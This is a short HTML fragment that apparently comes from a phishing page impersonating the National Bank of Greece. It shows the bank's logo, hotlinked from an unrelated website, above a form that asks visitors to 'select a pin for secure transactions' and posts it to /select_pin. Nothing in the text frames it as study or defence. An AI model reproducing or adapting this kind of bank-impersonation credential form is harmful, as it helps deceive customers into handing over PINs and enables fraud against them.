
    <div class="container">
      <div class="row">
      <center><img style="height:150px;" src="http://mikrometoxos.gr/wp-content/uploads/2015/03/NBG_logos_GR_color.jpg"></center>
      <form class="form-signin" action="/select_pin">
        <center><h2 class="form-signin-heading">Please select a pin for secure transactions</h2></center>
        <label for="inputEmail" class="sr-only">Pin</label>
        <input type="text" id="inputEmail" class="form-control" placeholder="Select pin" required autofocus>
        <button class="btn btn-lg btn-primary btn-block" type="submit">Continue</button>
      </form>
      </div>
    </div> <!-- /container -->



